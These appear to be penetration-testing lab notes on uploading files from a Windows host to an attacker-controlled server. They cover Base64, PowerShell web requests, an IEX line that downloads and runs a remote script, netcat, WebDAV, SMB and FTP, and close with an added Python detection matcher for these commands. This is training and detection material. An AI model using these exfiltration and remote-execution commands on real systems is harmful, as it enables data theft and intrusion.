# Go-To [[smbserver.py]]

# PowerShell Base64 Encode & Decode

Encode File Using PowerShell

```powershell
PS C:\wook> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

IyBDb3B5cmlnaHQgKGMpIDE5OTMt...

PS C:\wook> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash

Hash
----
3688374325B992DEF12793500307566D
```

Decode Base64 String in Linux

```bash
echo IyBDb3B5cmlnaHQgKGMpIDE5OTMt... | base64 -d > hosts
```

Check hash

```bash
md5sum hosts
3688374325b992def12793500307566d  hosts
```

# PowerShell Web Uploads

PowerShell doesn't have a built-in function for upload operations, but we can use `Invoke-WebRequest` or `Invoke-RestMethod` to build our upload function. We also need a web server that accepts uploads. For the web server, we can use `uploadserver`, an extended module of the Python `http.server` module.

Installing a Configured WebServer with Upload

```bash
pip3 install uploadserver
python3 -m uploadserver
```

Now we can use a PowerShell script `PSUpload.ps1`, which uses `Invoke-RestMethod` to perform the upload operations.

PowerShell Script to Upload a File to Python Upload Server

```powershell
PS C:\wook> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\wook> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373
```

# PowerShell Base64 Upload

Another way to use PowerShell and Base64 encoded files for upload operations is by using `Invoke-WebRequest` or `Invoke-RestMethod` together with [[netcat]]. We can use Netcat to listen in on a port we specify and send the file as a `POST` request.

```powershell
PS C:\wook> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\wook> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

Catch the Base64 data with Netcat and use the `base64` application with the decode option to convert the string to the file.

```bash
nc -lvnp 8000
```

```bash
echo <base64> | base64 -d -w 0 > hosts
```

# SMB Uploads

- Companies usually allow outbound traffic using HTTP/HTTPS.
- Companies don't allow the SMB protocol out of their internal network because this can open them up to potential attacks.
- An alternative is to run SMB over HTTP with `WebDav`.
- `WebDav` is an extension of HTTP which enables a webserver to behave like a fileserver.
- `WebDav` can also use HTTPS.

To set up a WebDav server, we need to install two Python modules: `wsgidav` and `cheroot`.

```bash
sudo pip3 install wsgidav cheroot
```

```bash
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

Connecting to the WebDav share

Now we can attempt to connect to the share using the `DavWWWRoot` directory.

- `DavWWWRoot` is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The `DavWWWRoot` keyword tells the Mini-Redirector driver, which handles WebDAV requests, that you are connecting to the root of the WebDAV server.

```powershell
dir \\<IP>\DavWWWRoot
```

Uploading Files using SMB

- If there are no SMB restrictions, we can use impacket-smbserver the same way it's set up for download operations.

```powershell
C:\wook> copy C:\Users\john\Desktop\SourceCode.zip \\<IP>\DavWWWRoot
C:\wook> copy C:\Users\john\Desktop\SourceCode.zip \\<IP>\sharefolder
```

# FTP Uploads

Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. We need to specify the option `--write` to allow clients to upload files to our attack host.

```bash
sudo python3 -m pyftpdlib --port 21 --write
```

PowerShell Upload File

```powershell
PS C:\wook> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

Create a Command File for the FTP client to upload a file

```powershell
C:\wook> echo open 192.168.49.128 > ftpcommand.txt
C:\wook> echo USER anonymous >> ftpcommand.txt
C:\wook> echo binary >> ftpcommand.txt
C:\wook> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\wook> echo bye >> ftpcommand.txt
C:\wook> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.

ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```
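
Seen from the monitoring side, each upload method in these notes leaves a recognizable command line in process-creation or PowerShell script-block logs. The following is an added example, not part of the original notes: a small Python matcher whose rule names, regexes and sample events are constructed for illustration (the `WS0x` hosts and `192.0.2.10` are placeholders).

```python
import re

# Hypothetical rule set: each regex keys on a command shape shown in the notes above.
RULES = {
    "b64_file_encode": re.compile(r"ToBase64String\(.*Get-Content.*-Encoding\s+byte", re.I),
    "http_post_upload": re.compile(r"Invoke-(WebRequest|RestMethod)\b.*-Method\s+POST", re.I),
    "remote_script_iex": re.compile(r"IEX\s*\(.*DownloadString\(", re.I),
    "webdav_unc_path": re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\b", re.I),
    "webclient_ftp_upload": re.compile(r"\.UploadFile\(\s*['\"]ftp://", re.I),
    "ftp_command_file": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
}

def match_rules(command_line):
    """Return the sorted names of all rules that match one logged command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def triage(events):
    """events: iterable of (host, command_line). Returns {host: set(rule names)}."""
    hits = {}
    for host, cmd in events:
        for name in match_rules(cmd):
            hits.setdefault(host, set()).add(name)
    return hits

def staged_upload_hosts(hits):
    """Hosts that both base64-encoded a file and issued an HTTP POST:
    the two-step pattern from the Base64 upload section, correlated across events."""
    return sorted(h for h, r in hits.items()
                  if {"b64_file_encode", "http_post_upload"} <= r)

# Constructed sample events (host, command line); not taken from a real log.
SAMPLE = [
    ("WS01", "$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))"),
    ("WS01", "Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64"),
    ("WS02", "copy C:\\Users\\john\\Desktop\\SourceCode.zip \\\\192.0.2.10\\DavWWWRoot"),
    ("WS03", "ftp -v -n -s:ftpcommand.txt"),
    ("WS04", "Invoke-WebRequest -Uri https://intranet.example/api -Method GET"),
]

if __name__ == "__main__":
    hits = triage(SAMPLE)
    for host in sorted(hits):
        print(host, sorted(hits[host]))
    print("staged base64 upload:", staged_upload_hosts(hits))
```

Single-rule hits such as a lone `-Method POST` are common in legitimate automation; the per-host correlation in `staged_upload_hosts` is what narrows the result to the encode-then-send sequence.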